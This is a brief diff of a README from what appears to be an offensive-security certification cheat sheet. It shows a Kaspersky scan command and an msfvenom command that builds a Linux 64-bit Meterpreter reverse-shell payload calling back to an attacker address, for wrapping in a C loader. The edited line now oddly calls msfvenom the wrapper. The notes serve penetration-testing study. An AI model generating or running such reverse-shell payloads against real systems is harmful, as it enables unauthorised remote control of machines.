peterkhe1999/CheatSheet/OSEP/README.md

 sudo kesl-control --start-t 1
 ```

-Generate a 64-bit unencoded shellcode with msfvenom, with an output type of "c", then insert it in a C program, which will act as a wrapper to load and run the shellcode.
+Generate a 64-bit unencoded shellcode with msfvenom, which will act as a wrapper to load and run the shellcode.

 ```bash
 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.119.120 LPORT=1337 -f c